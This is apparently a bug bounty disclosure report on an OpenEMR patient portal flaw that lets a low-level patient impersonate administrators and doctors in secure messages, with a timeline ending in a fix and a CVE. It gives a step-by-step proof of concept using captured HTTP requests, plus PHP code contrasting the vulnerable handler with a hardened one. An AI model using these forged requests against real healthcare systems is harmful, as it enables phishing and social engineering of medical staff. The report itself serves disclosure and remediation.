Missing Authorization Check Allows Impersonated Secure Messages in openemr/openemr


Reported on

Feb 27th 2023


Due to the lack of an authorization check when sending secure messages, an attacker with access to a low-level patient account in the portal can impersonate other users when sending secure messages. This allows a malicious actor to impersonate high-level users (administrators/doctors) when sending secure messages and can lead to legitimate-looking social engineering and phishing attacks.

Proof of Concept

Step 1. Log in to the patient portal using a low-level patient account.
Step 2. Using a tool such as Burp Suite, capture the following request and view its response. The response contains account information about privileged users and their accounts.

# Request
POST /openemr/portal/messaging/secure_chat.php?action=authusers HTTP/1.1
Host: demo.openemr.io
Te: trailers
Connection: close

# Response
HTTP/1.1 200 OK
Server: nginx/1.21.1
Date: Mon, 27 Feb 2023 02:47:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 367
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

[{"recip_id":"admin","dash":"1","username":"Billy Smith"},{"recip_id":"accountant","dash":"0","username":"Ernie Stent"},{"recip_id":"clinician","dash":"1","username":"Fred Stone"},{"recip_id":"physician","dash":"1","username":"Donna Lee"},{"recip_id":"receptionist","dash":"0","username":"Barbara Wallace"},{"recip_id":"zhportal","dash":"0","username":"Fred Jarvis"}]

Step 3. Go to the 'My Messages' section and compose a test message. Send this test message and capture the request using Burp.
Step 4. Replace the recipient_id, recipient_name, sender_id and sender_name parameters with the information acquired in step 2. For example, make the message appear to come from the admin account and address it to another high-privileged user.

POST /openemr/portal/messaging/handle_note.php HTTP/1.1
Host: demo.openemr.io
Cookie: username=Phil%20Belford; PortalOpenEMR=hsQebSDBqentL5pi-I6T5MVvqPNCGTX4d7pODNoKqhoy5-K%2C
Content-Length: 255
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/portal/messaging/messages.php
Connection: close


Step 5. Forward the altered request and the victim will receive the impersonated secure message. High-level users receive this message in the "Secure Messages" section even if they do not usually have access to this feature (a portal icon appears in the top right corner of their screen).


An attacker could use this vulnerability to impersonate administrators and high-level users to conduct advanced phishing and social engineering attacks within the application.
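The root cause is that handle_note.php trusts the sender fields supplied in the POST body. The following is an added illustration (not OpenEMR's code and not the fix commit) of that pattern beside a hardened handler that takes the sender only from the authenticated portal session and accepts only recipients the server itself offered via action=authusers; the session keys `pid` and `portal_username` are assumptions.

```php
<?php
// Added illustration, not code from OpenEMR or its fix commit.
// Session keys 'pid' / 'portal_username' are assumed names.

// Vulnerable pattern: who the note is "from" comes straight from the
// client-controlled POST body, so any portal user can claim any sender.
function buildNoteVulnerable(array $post): array
{
    return [
        'sender_id'      => $post['sender_id'],     // attacker-controlled
        'sender_name'    => $post['sender_name'],   // attacker-controlled
        'recipient_id'   => $post['recipient_id'],
        'recipient_name' => $post['recipient_name'],
        'body'           => $post['body'],
    ];
}

// Hardened pattern: sender identity is derived server-side from the session,
// and the recipient must match an entry the server already authorized
// (the same list action=authusers returns, keyed by recip_id).
function buildNoteHardened(array $post, array $session, array $authUsers): array
{
    if (empty($session['pid']) || empty($session['portal_username'])) {
        throw new RuntimeException('no authenticated portal session');
    }
    $recipId = (string)($post['recipient_id'] ?? '');
    $allowed = null;
    foreach ($authUsers as $u) {
        if (($u['recip_id'] ?? null) === $recipId) { $allowed = $u; break; }
    }
    if ($allowed === null) {
        throw new RuntimeException('recipient not in authorized list');
    }
    return [
        'sender_id'      => (string)$session['pid'],              // from session
        'sender_name'    => (string)$session['portal_username'],  // from session
        'recipient_id'   => $allowed['recip_id'],                 // server-side copy
        'recipient_name' => $allowed['username'],                 // server-side copy
        'body'           => (string)($post['body'] ?? ''),
    ];
}

// Constructed sample: a forged request like the one in the report, handled
// under a low-level patient's session. Only the hardened path keeps the
// real sender; the recipient name is also taken from the server's list.
$authUsers = json_decode('[{"recip_id":"admin","dash":"1","username":"Billy Smith"},'
    . '{"recip_id":"physician","dash":"1","username":"Donna Lee"}]', true);
$forged  = ['sender_id' => 'admin', 'sender_name' => 'Billy Smith',
            'recipient_id' => 'physician', 'recipient_name' => 'X', 'body' => 'hello'];
$session = ['pid' => '42', 'portal_username' => 'Phil Belford'];
print_r(buildNoteVulnerable($forged));
print_r(buildNoteHardened($forged, $session, $authUsers));
```

For detection, the same idea applies to existing data: any stored secure message whose sender_id does not match the portal account that created it was forged through this path.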

We are processing your report and will contact the openemr team within 24 hours. 7 months ago
We have contacted a member of the openemr team and are waiting to hear back 7 months ago
openemr/openemr maintainer has acknowledged this report 6 months ago
Brady Miller validated this vulnerability 6 months ago

This is fixed in the master branch at https://github.com/openemr/openemr/commit/3656bc88288957d68ba040cad2e5f9dbd1b607b1

@drew-sec, I am unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 in about 3-4 weeks, which will include this fix. At that time (after release OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a cve).

thanks for the report @drew-sec !

Andrew Steinberg has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
5 months ago


Now that 7.0.1 has been released, can we please have the CVE filed for this vulnerability?

4 months ago


Hey @bradymiller, could I please get CVEs filed for the three vulnerabilities that I disclosed for OpenEMR? Thanks!

4 months ago


@admin, could I please have CVEs filed for the three vulnerabilities I reported for this project?

Ben Harvie
4 months ago


Hi Andrew, the maintainer can assign a CVE once it is marked as fixed & published.

Brady Miller marked this as fixed in 7.0.1 with commit 3656bc 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Brady Miller published this vulnerability 4 months ago